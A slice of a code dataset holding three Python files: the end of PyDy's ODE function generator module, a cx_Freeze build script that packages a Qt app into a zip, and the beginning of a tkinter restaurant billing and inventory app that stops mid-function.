are\n passed in. The pre-0.3.0 style args always have three args: (x, t,\n d) where d is is a dictionary which should always at least contain\n the key 'constants'. It may also contain a key 'specified'.\"\"\"\n\n # DEPRECATED : Remove before 0.4.0 release.\n\n last_arg = args[-1]\n try:\n constants = last_arg['constants']\n # ValueError is needed for older NumPy versions.\n except (KeyError, IndexError, ValueError):\n return args\n else:\n with warnings.catch_warnings():\n warnings.simplefilter('once')\n warnings.warn(\"The old style args, i.e. {'constants': , \"\n \"'specified'}, for the generated function will \"\n \"be removed in PyDy 0.4.0.\", DeprecationWarning)\n\n new_args = list(args[:-1]) # gets x and t\n\n if self.specifieds is not None:\n new_args.append(last_arg['specified'])\n\n new_args.append(constants)\n\n return tuple(new_args)\n\n def _convert_constants_dict_to_array(self, p):\n \"\"\"Returns an array of numerical values from the constants\n dictionary in the correct order.\"\"\"\n\n # NOTE : It's unfortunate that this has to be run at every rhs eval,\n # because subsequent calls to rhs() doesn't require different\n # constants. I suppose you can sub out all the constants in the EoMs\n # before passing them into the generator. That would beg for the\n # capability to support self.constants=None to skip all of this\n # stuff in the rhs eval.\n for i, c in enumerate(self.constants):\n self._constants_values[i] = p[c]\n\n return self._constants_values\n\n def _parse_constants(self, *args):\n \"\"\"Returns an ndarray containing the numerical values of the\n constants in the correct order. 
If the constants are already an\n array, that array is returned.\"\"\"\n\n p = args[-1]\n try:\n p = self._convert_constants_dict_to_array(p)\n except IndexError:\n # p is an array so just return the args\n return args\n else:\n return args[:-1] + (p,)\n\n def _convert_specifieds_dict_to_array(self, x, t, r):\n\n for k, v in r.items():\n # TODO : Not sure if this is the best check here.\n if isinstance(type(k), UndefinedFunction):\n k = (k,)\n idx = [self.specifieds.index(symmy) for symmy in k]\n try:\n self._specifieds_values[idx] = v(x, t)\n except TypeError: # not callable\n # If not callable, then it should be a float, ndarray,\n # or indexable.\n self._specifieds_values[idx] = v\n\n return self._specifieds_values\n\n def _parse_specifieds(self, x, t, r, p):\n\n if isinstance(r, dict):\n # NOTE : This function sets self._specifieds_values, so here we\n # return nothing.\n self._convert_specifieds_dict_to_array(x, t, r)\n else:\n # More efficient.\n try:\n self._specifieds_values[:] = r(x, t)\n except TypeError: # not callable.\n # If not callable, then it should be a float or ndarray.\n self._specifieds_values[:] = r\n\n return x, t, self._specifieds_values, p\n\n def _parse_all_args(self, *args):\n \"\"\"Returns args formatted for the post 0.3.0 generators using all of\n the parsers. This is the slowest method and is used by default if no\n information is provided by the user on which type of args will be\n passed in.\"\"\"\n\n args = self._parse_old_style_extra_args(*args)\n\n args = self._parse_constants(*args)\n\n if self.specifieds is not None:\n args = self._parse_specifieds(*args)\n\n return args\n\n def _generate_rhs_docstring(self):\n\n template_values = {'num_states': self.num_states,\n 'state_list': self.list_syms(8, self.coordinates\n + self.speeds),\n 'specified_call_sig': '',\n 'constants_explanation':\n self._constants_doc_templates[\n self.constants_arg_type].format(**{\n 'num_constants': self.num_constants,\n 'constant_list': self.list_syms(\n 8, self.constants)}),\n 'specifieds_explanation': ''}\n\n if self.specifieds is not None:\n template_values['specified_call_sig'] = ' r,'\n specified_template_values = {\n 'num_specified': self.num_specifieds,\n 'specified_list': self.list_syms(8, self.specifieds)}\n template_values['specifieds_explanation'] = \\\n self._specifieds_doc_templates[self.constants_arg_type].format(\n **specified_template_values)\n\n return self._rhs_doc_template.format(**template_values)\n\n def _create_rhs_function(self):\n \"\"\"Returns a function in the form expected by scipy.integrate.odeint\n that computes the derivatives of the states.\"\"\"\n\n # This god awful mess below exists because of the need to optimize\n # the speed of the rhs evaluation. We unfortunately support way too\n # many ways to pass in extra arguments to the generated rhs\n # function. The default behavior is to parse the arguments passed\n # into the rhs function which can add a lot of computational\n # overhead. So we allow the user to specify what type the extra args\n # should be for both the constants and the specifieds. The constants\n # can be None, 'array', or 'dictionary'. The specifieds can be None,\n # 'array', 'function', or 'dictionary'. 
Thus we have 12 permutations\n # of this \"switch\".\n\n p_arg_type = self.constants_arg_type\n r_arg_type = self.specifieds_arg_type\n\n def slice_x(x):\n q = x[:self.num_coordinates]\n u = x[self.num_coordinates:]\n return q, u\n\n if p_arg_type is None and r_arg_type is None:\n\n # This is the only rhs that will properly check for the\n # pre-0.3.0 rhs args for backwards compatibility.\n\n def rhs(*args):\n # args: x, t, p\n # or\n # args: x, t, r, p\n\n args = self._parse_all_args(*args)\n\n q, u = slice_x(args[0])\n\n xdot = self._base_rhs(q, u, *args[2:])\n\n return xdot\n\n elif p_arg_type == 'array' and r_arg_type is None:\n\n # This could be combined with:\n # elif p_arg_type == 'array' and r_arg_type == 'array':\n\n def rhs(*args):\n # args: x, t, p\n # or\n # args: x, t, r, p\n\n if self.specifieds is not None:\n args = self._parse_specifieds(*args)\n\n q, u = slice_x(args[0])\n\n return self._base_rhs(q, u, *args[2:])\n\n elif p_arg_type == 'dictionary' and r_arg_type is None:\n\n # This could be combined with:\n # elif p_arg_type == 'dictionary' and r_arg_type == 'array':\n\n def rhs(*args):\n # args: x, t, p\n # or\n # args: x, t, r, p\n\n if self.specifieds is not None:\n args = self._parse_specifieds(*args)\n\n p = self._convert_constants_dict_to_array(args[-1])\n\n q, u = slice_x(args[0])\n\n xdot = self._base_rhs(q, u, *(args[2:-1] + (p,)))\n\n return xdot\n\n # All of the cases below must have specifieds, so the number of args\n # is known. r_arg_type is forces to be None if self.specifieds is\n # None.\n\n elif p_arg_type is None and r_arg_type == 'array':\n\n def rhs(*args):\n # args: x, t, r, p\n\n args = self._parse_constants(*args)\n\n q, u = slice_x(args[0])\n\n return self._base_rhs(q, u, *args[2:])\n\n elif p_arg_type == 'array' and r_arg_type == 'array':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n return self._base_rhs(q, u, *args[2:])\n\n elif p_arg_type == 'dictionary' and r_arg_type == 'array':\n\n def rhs(*args):\n # args: x, t, r, p\n\n p = self._convert_constants_dict_to_array(args[-1])\n\n q, u = slice_x(args[0])\n\n return self._base_rhs(q, u, *(args[2:-1] + (p,)))\n\n elif p_arg_type is None and r_arg_type == 'dictionary':\n\n def rhs(*args):\n # args: x, t, r, p\n\n args = self._parse_constants(*args)\n\n q, u = slice_x(args[0])\n\n r = self._convert_specifieds_dict_to_array(*args[:3])\n\n return self._base_rhs(q, u, r, args[-1])\n\n elif p_arg_type == 'array' and r_arg_type == 'dictionary':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n r = self._convert_specifieds_dict_to_array(*args[:3])\n\n return self._base_rhs(q, u, r, args[-1])\n\n elif p_arg_type == 'dictionary' and r_arg_type == 'dictionary':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n p = self._convert_constants_dict_to_array(args[-1])\n\n r = self._convert_specifieds_dict_to_array(*args[:3])\n\n return self._base_rhs(q, u, r, p)\n\n elif p_arg_type is None and r_arg_type == 'function':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n args = self._parse_constants(*args)\n\n r = args[2](*args[:2])\n\n return self._base_rhs(q, u, r, args[-1])\n\n elif p_arg_type == 'array' and r_arg_type == 'function':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n r = args[2](*args[:2])\n\n return self._base_rhs(q, u, r, args[-1])\n\n elif p_arg_type == 'dictionary' and r_arg_type == 'function':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n p = 
self._convert_constants_dict_to_array(args[-1])\n\n r = args[2](*args[:2])\n\n return self._base_rhs(q, u, r, p)\n\n rhs.__doc__ = self._generate_rhs_docstring()\n\n return rhs\n\n def _create_base_rhs_function(self):\n \"\"\"Sets the self._base_rhs function. This functin accepts arguments\n in this form: (q, u, p) or (q, u, r, p).\"\"\"\n\n if self.system_type == 'full rhs':\n\n self._base_rhs = self.eval_arrays\n\n elif self.system_type == 'full mass matrix':\n\n def base_rhs(*args):\n\n M, F = self.eval_arrays(*args)\n return self._solve_linear_system(M, F)\n\n self._base_rhs = base_rhs\n\n elif self.system_type == 'min mass matrix':\n\n xdot = np.empty(self.num_states, dtype=float)\n\n def base_rhs(*args):\n M, F, qdot = self.eval_arrays(*args)\n if self.num_speeds == 1:\n udot = F / M\n else:\n udot = self._solve_linear_system(M, F)\n xdot[:self.num_coordinates] = qdot\n xdot[self.num_coordinates:] = udot\n return xdot\n\n self._base_rhs = base_rhs\n\n def define_inputs(self):\n \"\"\"Sets self.inputs to the list of sequences [q, u, p] or [q, u, r,\n p].\"\"\"\n\n self.inputs = [self.coordinates, self.speeds, self.constants]\n\n if self.specifieds is not None:\n self.inputs.insert(2, self.specifieds)\n\n def generate(self):\n \"\"\"Returns a function that evaluates the right hand side of the\n first order ordinary differential equations in one of two forms:\n\n x' = f(x, t, p)\n\n or\n\n x' = f(x, t, r, p)\n\n See the docstring of the generated function for more details.\n\n \"\"\"\n\n if self.system_type == 'full rhs':\n self.generate_full_rhs_function()\n elif self.system_type == 'full mass matrix':\n self.generate_full_mass_matrix_function()\n elif self.system_type == 'min mass matrix':\n self.generate_min_mass_matrix_function()\n\n self._create_base_rhs_function()\n\n return self._create_rhs_function()\n\n\nclass CythonODEFunctionGenerator(ODEFunctionGenerator):\n\n def __init__(self, *args, **kwargs):\n\n if Cython is None:\n raise ImportError('Cython must be installed to use this class.')\n else:\n super(CythonODEFunctionGenerator, self).__init__(*args, **kwargs)\n\n @staticmethod\n def _cythonize(outputs, inputs):\n return CythonMatrixGenerator(inputs, outputs).compile()\n\n def _set_eval_array(self, f):\n\n if self.specifieds is None:\n self.eval_arrays = lambda q, u, p: f(q, u, p, *self._empties)\n else:\n self.eval_arrays = lambda q, u, r, p: f(q, u, r, p,\n *self._empties)\n\n def generate_full_rhs_function(self):\n\n self.define_inputs()\n outputs = [self.right_hand_side]\n\n self._empties = (np.empty(self.num_states, dtype=float),)\n\n self._set_eval_array(self._cythonize(outputs, self.inputs))\n\n def generate_full_mass_matrix_function(self):\n\n self.define_inputs()\n outputs = [self.mass_matrix, self.right_hand_side]\n\n mass_matrix_result = np.empty(self.num_states ** 2, dtype=float)\n rhs_result = np.empty(self.num_states, dtype=float)\n\n self._empties = (mass_matrix_result, rhs_result)\n\n self._set_eval_array(self._cythonize(outputs, self.inputs))\n\n def generate_min_mass_matrix_function(self):\n\n self.define_inputs()\n outputs = [self.mass_matrix, self.right_hand_side,\n self.coordinate_derivatives]\n\n mass_matrix_result = np.empty(self.num_speeds ** 2, dtype=float)\n rhs_result = np.empty(self.num_speeds, dtype=float)\n kin_diffs_result = np.empty(self.num_coordinates, dtype=float)\n self._empties = (mass_matrix_result, rhs_result, kin_diffs_result)\n\n self._set_eval_array(self._cythonize(outputs, self.inputs))\n\n\nclass 
LambdifyODEFunctionGenerator(ODEFunctionGenerator):\n\n def _lambdify(self, outputs):\n # TODO : We could forgo this substitution for generation speed\n # purposes and have lots of args for lambdify (like it used to be\n # done) but there may be some limitations on number of args.\n subs = {}\n vec_inputs = []\n if self.specifieds is None:\n def_vecs = ['q', 'u', 'p']\n else:\n def_vecs = ['q', 'u', 'r', 'p']\n\n for syms, vec_name in zip(self.inputs, def_vecs):\n v = sm.DeferredVector(vec_name)\n for i, sym in enumerate(syms):\n subs[sym] = v[i]\n vec_inputs.append(v)\n\n try:\n outputs = [me.msubs(output, subs) for output in outputs]\n except AttributeError:\n # msubs doesn't exist in SymPy < 0.7.6.\n outputs = [output.subs(subs) for output in outputs]\n\n modules = [{'ImmutableMatrix': np.array}, 'numpy']\n\n return sm.lambdify(vec_inputs, outputs, modules=modules)\n\n def generate_full_rhs_function(self):\n\n self.define_inputs()\n outputs = [self.right_hand_side]\n\n f = self._lambdify(outputs)\n\n if self.specifieds is None:\n self.eval_arrays = lambda q, u, p: np.squeeze(f(q, u, p))\n else:\n self.eval_arrays = lambda q, u, r, p: np.squeeze(f(q, u, r, p))\n\n def generate_full_mass_matrix_function(self):\n\n self.define_inputs()\n outputs = [self.mass_matrix, self.right_hand_side]\n\n f = self._lambdify(outputs)\n\n if self.specifieds is None:\n self.eval_arrays = lambda q, u, p: tuple([np.squeeze(o) for o in\n f(q, u, p)])\n else:\n self.eval_arrays = lambda q, u, r, p: tuple([np.squeeze(o) for o\n in f(q, u, r, p)])\n\n def generate_min_mass_matrix_function(self):\n\n self.define_inputs()\n outputs = [self.mass_matrix, self.right_hand_side,\n self.coordinate_derivatives]\n\n f = self._lambdify(outputs)\n\n if self.specifieds is None:\n self.eval_arrays = lambda q, u, p: tuple([np.squeeze(o) for o in\n f(q, u, p)])\n else:\n self.eval_arrays = lambda q, u, r, p: tuple([np.squeeze(o) for o\n in f(q, u, r, p)])\n\n\nclass TheanoODEFunctionGenerator(ODEFunctionGenerator):\n\n def __init__(self, *args, **kwargs):\n\n if theano is None:\n raise ImportError('Theano must be installed to use this class.')\n else:\n super(TheanoODEFunctionGenerator, self).__init__(*args, **kwargs)\n\n def define_inputs(self):\n\n if self.specifieds is None:\n self.inputs = self.coordinates + self.speeds + self.constants\n else:\n self.inputs = (self.coordinates + self.speeds + self.specifieds\n + self.constants)\n\n def _theanoize(self, outputs):\n\n self.define_inputs()\n\n f = theano_function(self.inputs, outputs, on_unused_input='ignore')\n\n # Theano will run faster if you trust the input. I'm not sure\n # what the implications of this are. See:\n # http://deeplearning.net/software/theano/tutorial/faq.html#faster-small-theano-function\n # Note that map(np.asarray, np.hstack(args)) is required if\n # trust_input is True. If it is False, then it will sanitize the\n # inputs. 
I'm not sure which one is faster.\n        f.trust_input = True\n\n        return f\n\n    def generate_full_rhs_function(self):\n\n        outputs = [self.right_hand_side]\n\n        f = self._theanoize(outputs)\n\n        def eval_arrays(*args):\n            vals = map(np.asarray, np.hstack(args))\n            return np.squeeze(f(*vals))\n\n        self.eval_arrays = eval_arrays\n\n    def generate_full_mass_matrix_function(self):\n\n        outputs = [self.mass_matrix, self.right_hand_side]\n\n        f = self._theanoize(outputs)\n\n        def eval_arrays(*args):\n            vals = map(np.asarray, np.hstack(args))\n            return tuple([np.squeeze(o) for o in f(*vals)])\n\n        self.eval_arrays = eval_arrays\n\n    def generate_min_mass_matrix_function(self):\n\n        outputs = [self.mass_matrix, self.right_hand_side,\n                   self.coordinate_derivatives]\n\n        f = self._theanoize(outputs)\n\n        def eval_arrays(*args):\n            vals = map(np.asarray, np.hstack(args))\n            return tuple([np.squeeze(o) for o in f(*vals)])\n\n        self.eval_arrays = eval_arrays\n\n\ndef generate_ode_function(*args, **kwargs):\n    \"\"\"This is a function wrapper to the above classes. The docstring is\n    automatically generated below.\"\"\"\n\n    generators = {'lambdify': LambdifyODEFunctionGenerator,\n                  'cython': CythonODEFunctionGenerator,\n                  'theano': TheanoODEFunctionGenerator}\n\n    generator = kwargs.pop('generator', 'lambdify')\n\n    try:\n        # See if user passed in a custom class.\n        g = generator(*args, **kwargs)\n    except TypeError:\n        # See if user passed in a string.\n        try:\n            Generator = generators[generator]\n            g = Generator(*args, **kwargs)\n        except KeyError:\n            msg = '{} is not a valid generator.'.format(generator)\n            raise NotImplementedError(msg)\n        else:\n            return g.generate()\n    else:\n        return g.generate()\n\n\n_divider = '\\n        Notes\\n        ====='\n_docstr = ODEFunctionGenerator.__init__.__doc__\n_before_notes, _after_notes = _docstr.split(_divider)\n_extra_parameters_doc = \\\n\"\"\"\\\n    generator : string or an ODEFunctionGenerator, optional\n        The method used for generating the numeric right hand side. The\n        string options are {'lambdify'|'theano'|'cython'} with\n        'lambdify' being the default. You can also pass in a custom\n        subclass of ODEFunctionGenerator.\n\n    Returns\n    =======\n    rhs : function\n        A function which evaluates the derivatives of the states. 
See the\n function's docstring for more details after generation.\n\"\"\"\ngenerate_ode_function.__doc__ = ('' * 4 + _before_notes +\n _extra_parameters_doc + _divider +\n _after_notes)\n","sub_path":"pydy/codegen/ode_function_generators.py","file_name":"ode_function_generators.py","file_ext":"py","file_size_in_byte":34892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"282622838","text":"#\n# python setup.py build\n\nfrom cx_Freeze import setup, Executable\nimport sys\nimport os\nimport shutil\nimport zipfile\n\n\n__appname__ = \"userial-qt5\"\n__version__ = \"0.9.0\"\n__icon__ = os.path.join(os.curdir, 'rc', 'logo.ico')\n__author__ = \"Aleksandr Smirnov\"\n__copyright__ = \"Copyright 2016 by Navi-Dals\"\n\n\nBUILD_DIR = \"exe.{}-{}\".format(sys.platform, sys.version[:3])\npath_build = os.path.join(os.curdir, \"build\", BUILD_DIR)\n\n\n# Build executable file\nbuild_exe_options = {\"excludes\": [\"xml\", \"email\", \"html\", \"http\", \"unittest\", \"urllib\",\n \"pydoc_data\", \"\"]}\n\nexe = Executable(\n script=\"main.py\",\n base=\"Win32GUI\",\n targetName=__appname__ + \".exe\",\n icon=__icon__\n)\n\ntry:\n setup(\n name=__appname__ + \".exe\",\n version=__version__,\n author=__author__,\n description=__copyright__,\n options={\"build_exe\": build_exe_options},\n executables=[exe]\n )\nexcept Exception as e:\n print(e)\n\n# Remove nonusble resource\nprint(\"Remove nonusble resource\", end=10*'.')\ntry:\n path_rm = os.path.join(path_build, \"PyQt5\", \"Qt\")\n if os.path.exists(path_rm):\n shutil.rmtree(path_rm)\n print('Ok')\nexcept Exception as e:\n print('Error')\n print(e)\n\n# Create zip\nprint(\"Create zip file\", end=10*'.')\ntry:\n def zipdir(path, ziph):\n for root, dirs, files in os.walk(path):\n for file in files:\n ziph.write(os.path.join(root, file))\n\n zip_name = '.'.join(['{}-{}'.format(__appname__, __version__), 'zip'])\n\n zipf = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)\n zipdir(path_build, zipf)\n zipf.close()\n\n zip_dist = os.path.join(os.curdir, \"zip\")\n if not os.path.exists(zip_dist):\n os.makedirs(zip_dist)\n\n shutil.move(os.path.join(os.curdir, zip_name), os.path.join(zip_dist))\n\n print('Ok')\nexcept Exception as e:\n print(\"Error\")\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"363905947","text":"from tkinter import*\r\nfrom tkinter import messagebox\r\nimport random\r\nimport time\r\nimport win1_bk\r\n\r\n\r\nroot=Tk()\r\nroot.geometry(\"1600x8000\")\r\nroot.title(\"My Restaurant\")\r\n\r\nTops = Frame(root,width=100, relief=SUNKEN)\r\nTops.pack(side=TOP)\r\n\r\ns1 = Frame(root,width=1800, height =700, relief=SUNKEN)\r\ns1.pack(padx=10,pady=10)\r\n\r\n#s2 = Frame(root,width=600, height =300,bg=\"powder blue\", relief=SUNKEN)\r\n#s2.pack(side=RIGHT)\r\n\r\nlab1= Label(Tops, font=('arial',50,'bold'),text=\" My Restaurant \", fg= \"Green\", bd=10,anchor='w')\r\nlab1.grid(row=0,column=0)\r\n\r\nct=time.asctime(time.localtime(time.time()))\r\nlab2= Label(Tops, font=('arial',20,'bold'),text=ct, fg= \"Green\", bd=10,anchor='w')\r\nlab2.grid(row=1,column=0)\r\n\r\nlab3= Label(s1, font=('arial',20,'bold'),text=\"Login-ID\", fg= \"Blue\", bd=10,anchor='w')\r\nlab3.grid(row=0,column=0)\r\n\r\ntext1=StringVar()\r\ntxtShow=Entry(s1,font=('arial',20,'bold'),textvariable=text1,bd=3,insertwidth=4,bg=\"powder blue\", 
justify='left')\r\ntxtShow.grid(row=0,column=1)\r\n\r\nlab4= Label(s1, font=('arial',20,'bold'),text=\"Password\", fg= \"Blue\", bd=10,anchor='w')\r\nlab4.grid(row=1,column=0)\r\n\r\ntext2=StringVar()\r\ntxtShow1=Entry(s1,font=('arial',20,'bold'),textvariable=text2,bd=3,insertwidth=4,bg=\"powder blue\", justify='left', show='*')\r\ntxtShow1.grid(row=1,column=1)\r\nrand = StringVar()\r\n\r\nIdly=StringVar()\r\nDosa=StringVar()\r\nKesari=StringVar()\r\nSubTotal=StringVar()\r\nTotal=StringVar()\r\nService_Charge=StringVar()\r\nDrinks=StringVar()\r\nTax=StringVar()\r\nCost=StringVar()\r\nPulav=StringVar()\r\n\r\ndef adduser():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n lab5= Label(s1, font=('arial',20,'bold'),text='Add New User', fg= \"Blue\", bd=10,anchor='w')\r\n lab5.grid(row=0,column=0)\r\n lab3= Label(s1, font=('arial',20,'bold'),text=\"User-ID\", fg= \"Blue\", bd=10,anchor='w')\r\n lab3.grid(row=1,column=0)\r\n text1=StringVar()\r\n txtShow=Entry(s1,font=('arial',20,'bold'),textvariable=text1,bd=3,insertwidth=4,bg=\"powder blue\", justify='left')\r\n txtShow.grid(row=0,column=1)\r\n\r\n lab4= Label(s1, font=('arial',20,'bold'),text=\"Password\", fg= \"Blue\", bd=10,anchor='w')\r\n lab4.grid(row=1,column=0)\r\n\r\n text2=StringVar()\r\n txtShow1=Entry(s1,font=('arial',20,'bold'),textvariable=text2,bd=3,insertwidth=4,bg=\"powder blue\", justify='left', show='*')\r\n txtShow1.grid(row=1,column=1)\r\n \r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Submit\", bg=\"powder blue\", command=lambda:win1_bk.add(text1.get(),text2.get())).grid(row=3,column=1)\r\n \r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home\", bg=\"powder blue\", command=lambda:show_admin()).grid(row=4,column=1)\r\n\r\ndef deluser():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n lab5= Label(s1, font=('arial',20,'bold'),text='Delete User', fg= \"Blue\", bd=10,anchor='w')\r\n lab5.grid(row=0,column=0)\r\n lab3= Label(s1, font=('arial',20,'bold'),text=\"User-ID\", fg= \"Blue\", bd=10,anchor='w')\r\n lab3.grid(row=1,column=0)\r\n text1=StringVar()\r\n txtShow=Entry(s1,font=('arial',20,'bold'),textvariable=text1,bd=3,insertwidth=4,bg=\"powder blue\", justify='left')\r\n txtShow.grid(row=1,column=1)\r\n \r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Delete\", bg=\"powder blue\", command=lambda:win1_bk.delete(text1.get())).grid(row=3,column=1)\r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home\", bg=\"powder blue\", command=lambda:show_admin()).grid(row=4,column=1)\r\n\r\n\r\ndef showuser():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n lab3= Label(s1, font=('arial',20,'bold'),text=\" List of Users\", fg= \"Blue\", bd=10,anchor='w')\r\n lab3.grid(row=0,column=1)\r\n lb=Listbox(s1,height=20,width=94)\r\n lb.grid(row=2,column=0,columnspan=6)\r\n #lb.delete(0,END)\r\n for row in win1_bk.viewall():\r\n lb.insert(END,row)\r\n \r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home\", bg=\"powder blue\", command=lambda:show_admin()).grid(row=8,column=1)\r\n\r\ndef show_admin():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n \r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"create user\", bg=\"powder blue\", command=lambda:adduser()).grid(row=0,column=1)\r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"delete user\", bg=\"powder blue\", command=lambda:deluser()).grid(row=1,column=1)\r\n b3=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"show users\", 
bg=\"powder blue\", command=lambda:showuser()).grid(row=2,column=1)\r\n b4=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Main Project\", bg=\"powder blue\", command=lambda:call_sys()).grid(row=3,column=1)\r\n\r\n#====================================Restaraunt Info 1===========================================================\r\ndef Invent():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n \r\n Idly=StringVar()\r\n Dosa=StringVar()\r\n Kesari=StringVar()\r\n Pulav=StringVar()\r\n Drinks=StringVar()\r\n home()\r\n\r\ndef qExit():\r\n root.destroy()\r\n\r\n\r\n \r\ndef showinvent():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n lab3= Label(s1, font=('arial',20,'bold'),text=\" List of Stocks\", fg= \"Blue\", bd=10,anchor='w')\r\n lab3.grid(row=0,column=1)\r\n lb=Listbox(s1,height=20,width=94)\r\n lb.grid(row=2,column=0,columnspan=6)\r\n #lb.delete(0,END)\r\n import win1_bk\r\n rows=win1_bk.viewstock()\r\n lb.insert(END,'IDLY : ',rows[0][1])\r\n lb.insert(END,'DOSA : ',rows[0][2])\r\n lb.insert(END,'KESARI : ',rows[0][3])\r\n lb.insert(END,'DRINKS : ',rows[0][4])\r\n lb.insert(END,'PULAV : ',rows[0][5])\r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home\", bg=\"powder blue\", command=lambda:home()).grid(row=8,column=1)\r\n\r\ndef upd():\r\n messagebox.showinfo(Idly.get(),Dosa.get())\r\n #win1_bk.update(1,Idly.get(),Dosa.get(),Kesari.get(),Drinks.get(),Pulav.get())\r\n\r\ndef invent():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n lblhd= Label(s1, font=('arial', 16, 'bold'),text=\"Update the current Quantity\",bd=16,anchor=\"w\")\r\n lblIdly= Label(s1, font=('arial', 16, 'bold'),text=\"Idly\",bd=16,anchor=\"w\")\r\n lblIdly.grid(row=1, column=0)\r\n Idly=StringVar()\r\n #e4 = Entry(window,textvariable=category,width=50)\r\n txtIdly=Entry(s1, font=('arial',16,'bold'),textvariable=Idly)#,bd=1,insertwidth=4,bg=\"powder blue\",justify='left')\r\n txtIdly.grid(row=1,column=1)\r\n\r\n\r\n lblDosa= Label(s1, font=('arial', 16, 'bold'),text=\"Dosa\",bd=16,anchor=\"w\")\r\n lblDosa.grid(row=2, column=0)\r\n Dosa=StringVar()\r\n txtDosa=Entry(s1, font=('arial',16,'bold'),textvariable=Dosa)#,bd=1,insertwidth=4,bg=\"powder blue\",justify='left')\r\n txtDosa.grid(row=2,column=1)\r\n\r\n\r\n lblKesari= Label(s1, font=('arial', 16, 'bold'),text=\"Kesari bath\",bd=16,anchor=\"w\")\r\n lblKesari.grid(row=3, column=0)\r\n Kesari=StringVar()\r\n txtKesari=Entry(s1, font=('arial',16,'bold'),textvariable=Kesari)#,bd=1,insertwidth=4,bg=\"powder blue\",justify='left')\r\n txtKesari.grid(row=3,column=1)\r\n\r\n lblPulav= Label(s1, font=('arial', 16, 'bold'),text=\"Pulav\",bd=16,anchor=\"w\")\r\n lblPulav.grid(row=4, column=0)\r\n Pulav=StringVar()\r\n txtPulav=Entry(s1, font=('arial',16,'bold'),textvariable=Pulav)#,bd=1,insertwidth=4,bg=\"powder blue\",justify='left')\r\n txtPulav.grid(row=4,column=1)\r\n\r\n lblDrinks= Label(s1, font=('arial', 16, 'bold'),text=\"Drinks\",bd=16,anchor=\"w\")\r\n lblDrinks.grid(row=5, column=0)\r\n Drinks=StringVar()\r\n txtDrinks=Entry(s1, font=('arial',16,'bold'),textvariable=Drinks)#,bd=1,insertwidth=4,bg=\"powder blue\",justify='left')\r\n txtDrinks.grid(row=5,column=1)\r\n \r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Update\", bg=\"powder blue\", command=lambda:win1_bk.update(1,Idly.get(),Dosa.get(),Kesari.get(),Drinks.get(),Pulav.get())).grid(row=8,column=1)\r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home\", bg=\"powder blue\", 
command=lambda:home()).grid(row=10,column=1)\r\n\r\ndef home():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\" Update Inventory\", bg=\"powder blue\", command=lambda:invent()).grid(row=0,column=1)\r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Show Inventory\", bg=\"powder blue\", command=lambda:showinvent()).grid(row=1,column=1)\r\n b3=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Home \", bg=\"powder blue\", command=lambda:call_sys()).grid(row=2,column=1)\r\n\r\ndef Ref():\r\n x=random.randint(10908,500876)\r\n randomRef=str(x)\r\n\r\n rand.set(randomRef)\r\n\r\n if (Idly.get()==\"\"):\r\n CoIdly=0\r\n else:\r\n CoIdly=float(Idly.get())\r\n\r\n \r\n if (Dosa.get()==\"\"):\r\n CoDosa=0\r\n else:\r\n CoDosa=float(Dosa.get())\r\n\r\n if (Kesari.get()==\"\"):\r\n CoKesari=0\r\n else:\r\n CoKesari=float(Kesari.get())\r\n\r\n if (Pulav.get()==\"\"):\r\n CoPulav=0\r\n else:\r\n CoPulav=float(Pulav.get())\r\n \r\n \r\n if (Drinks.get()==\"\"):\r\n CoD=0\r\n else:\r\n CoD=float(Drinks.get())\r\n \r\n CostofIdly =CoIdly * 25\r\n CostofDrinks=CoD * 20\r\n CostofDosa = CoDosa* 35\r\n CostofKesari = CoKesari * 25\r\n CostPulav = CoPulav* 35\r\n \r\n CostofMeal= \"Rs\", str('%.2f' % (CostofIdly+CostofDrinks+CostofDosa+CostofKesari+CostPulav))\r\n\r\n PayTax=((CostofIdly+CostofDrinks+CostofDosa+CostofKesari+CostPulav) * 0.2)\r\n\r\n TotalCost=(CostofIdly+CostofDrinks+CostofDosa+CostofKesari+CostPulav)\r\n \r\n Ser_Charge= ((CostofIdly+CostofDrinks+CostofDosa+CostofKesari+CostPulav)/99)\r\n\r\n Service = \"Rs\", str ('%.2f' % Ser_Charge)\r\n\r\n OverAllCost =\"Rs\", str ('%.2f' % (PayTax+TotalCost+Ser_Charge))\r\n\r\n PaidTax= \"Rs\", str ('%.2f' % PayTax)\r\n\r\n 